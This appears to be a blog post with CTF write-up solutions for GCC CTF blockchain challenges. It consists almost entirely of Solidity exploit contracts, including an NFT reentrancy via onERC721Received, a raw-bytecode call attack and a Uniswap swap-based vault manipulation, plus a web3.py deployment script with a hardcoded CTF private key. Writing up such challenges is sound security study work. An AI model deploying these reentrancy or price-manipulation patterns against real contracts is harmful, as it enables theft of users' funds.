https://ctftime.org/event/2251
synthatsu_katana_thief
contract Solve{
Challenge public challenge;
KatanaSale public katanaSale;
constructor(address _challenge) {
challenge = Challenge(_challenge);
katanaSale = KatanaSale(challenge.katanaSale());
katanaSale.becomeBeyond("I will check out @BeyondBZH and @gcc_ensibs on X");
katanaSale.endSale();
katanaSale.transfer(challenge.PLAYER(), 60);
}
}
gcc_first_drop
contract Solve {
Challenge public challenge;
BeyondNFT public beyondNFT;
AboveNFT public aboveNFT;
uint public num = 0;
constructor (address _challenge) payable {
challenge = Challenge(_challenge);
beyondNFT = BeyondNFT(challenge.beyond());
beyondNFT.mint{value: 1 ether}();
aboveNFT = AboveNFT(challenge.above());
}
function execute() public {
beyondNFT.claimSpecialPrize();
for(uint i = 1; i < 7; i++) {
aboveNFT.transferFrom(address(this), challenge.PLAYER(), i);
}
}
function onERC721Received(address to, address to2, uint256 tokenId, bytes calldata data) public returns (bytes4) {
if (num < 7) {
num++;
beyondNFT.claimSpecialPrize();
}
return this.onERC721Received.selector;
}
}
ode
contract Solve {
Challenge public challenge = Challenge(0xD3dFB133C651DA0948F1D35464F459CCcd7d42B2);
address public target = challenge.target();
constructor() payable {}
function step1() public payable{
bytes memory data = abi.encode(uint256(uint160(address(this))));
(bool su, bytes memory g) = address(challenge.target()).call(data);
require(su == true);
bytes memory data2 = hex'5f6060565b608060405260258060726000396000f3fe7f0000000000000000576861742061626f7574203078356320262030783562203f60005500';
(su, g) = address(challenge.target()).call{value: 59}(data2);
require(su == true);
}
function step2() public payable{
bytes memory data = abi.encode(uint256(uint160(address(this)) + 1));
(bool su, bytes memory g) = address(challenge.target()).call(data);
require(su == true);
}
}
tootb
curl -X POST -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"anvil_setBalance","params":["0xCaffE305b3Cc9A39028393D3F338f2a70966Cb85", "20000000000000000000000000000000"],"id":84}' http://worker03.gcc-ctf.com:11560/rpc
gcc_pincer
contract Solve {
IUniswapV2Router02 public immutable uniswapRouter = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
address public immutable WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
address public immutable MINAMINAO = 0x710ACb69aCa6aD658633A50D5e0CFFA52Dc7Bf07;
address public immutable PLAYER = 0xCaffE305b3Cc9A39028393D3F338f2a70966Cb85;
Beyond public beyond;
Vault public vault;
Challenge public challenge;
uint public before_vault_weth;
uint public before_vault_beyond;
uint public after_vault_weth;
uint public after_vault_beyond;
constructor (address _challenge) payable{
challenge = Challenge(_challenge);
beyond = challenge.beyond();
vault = challenge.vault();
before_vault_weth = IERC20(WETH).balanceOf(address(vault));
before_vault_beyond = IERC20(beyond).balanceOf(address(vault));
}
function estimateAmountOut(uint256 amountIn, address[] memory path) external view returns(uint256) {
uint256[] memory amounts = uniswapRouter.getAmountsOut(amountIn, path); //// ?
return amounts[1] - (amounts[1] * 5 / 1000);
}
function step1() public {
IWETH(WETH).deposit{value : 490 ether}();
IERC20(WETH).approve(address(uniswapRouter), type(uint256).max);
IERC20(WETH).approve(address(beyond), type(uint256).max);
IERC20(beyond).approve(address(uniswapRouter), type(uint256).max);
IERC20(beyond).approve(address(beyond), type(uint256).max);
beyond.buy(350 ether);
address[] memory path = new address[](2);
path[1] = WETH;
path[0] = address(beyond);
uniswapRouter.swapExactTokensForTokens(350 ether, this.estimateAmountOut(350 ether, path), path, address(this), block.timestamp);
}
function step2() public {
after_vault_weth = IERC20(WETH).balanceOf(address(vault));
after_vault_beyond = IERC20(beyond).balanceOf(address(vault));
address[] memory path = new address[](2);
path[0] = WETH;
path[1] = address(beyond);
uniswapRouter.swapExactTokensForTokens(140 ether, this.estimateAmountOut(140 ether, path), path, address(this), block.timestamp);
}
}
from web3 import Web3
import json
import time
w3 = Web3(Web3.HTTPProvider("http://worker02.gcc-ctf.com:13141/rpc"))
#Check Connection
t=w3.is_connected()
print(t)
# Get private key
prikey = '0x6715d324d14e0565ab02a575fa5f74540719ba065a610cba6497cdbf22cd5cdb'
challenge_addr = "0x8E4Dc4233Fe0c90674924c0f5b94A78F60fe0D29"
# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address
f = open("att.abi", "r"); contract_abi= f.read(); f.close()
f = open("att.bin", "r"); contract_bytecode= f.read(); f.close()
contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
transaction = contract.constructor(challenge_addr).build_transaction(
{
"chainId": w3.eth.chain_id,
"gasPrice": w3.eth.gas_price,
"from": Public_Address,
"nonce": w3.eth.get_transaction_count(Public_Address),
"value": 490 * 10**18
# "value": 0
}
)
sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
print("Deploying Contract!")
# Send the transaction
transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
# Wait for the transaction to be mined, and get the transaction receipt
print("Waiting for transaction to finish...")
transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
print(transaction_receipt)
print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
cont_addr = transaction_receipt.contractAddress
contract = w3.eth.contract(address=cont_addr, abi=contract_abi, bytecode=contract_bytecode)
print(contract.functions["before_vault_weth"]().call()//10**18)
print(contract.functions["before_vault_beyond"]().call()//10**18)
func_call = contract.functions["step1"]().build_transaction({
"from": myAddr,
"nonce": w3.eth.get_transaction_count(myAddr),
"gasPrice": w3.eth.gas_price,
"chainId": w3.eth.chain_id,
})
signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
print(transaction_receipt)
time.sleep(120)
func_call = contract.functions["step2"]().build_transaction({
"from": myAddr,
"nonce": w3.eth.get_transaction_count(myAddr),
"gasPrice": w3.eth.gas_price,
"chainId": w3.eth.chain_id,
})
signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
print(transaction_receipt)
print(contract.functions["after_vault_weth"]().call()//10**18)
print(contract.functions["after_vault_beyond"]().call()//10**18)
'writeups' 카테고리의 다른 글
Dreamhack Invitational Quals (0) | 2024.05.03 |
---|---|
osu!gaming 2024 - blockchain (0) | 2024.03.04 |
LACTF 2024 - zerocoin, remi-s world (0) | 2024.02.19 |
DiceCTF 2024 Quals - floordrop(blockchain) (0) | 2024.02.05 |
RealWorldCTF 2024 - blockchain(safebridge) (0) | 2024.01.28 |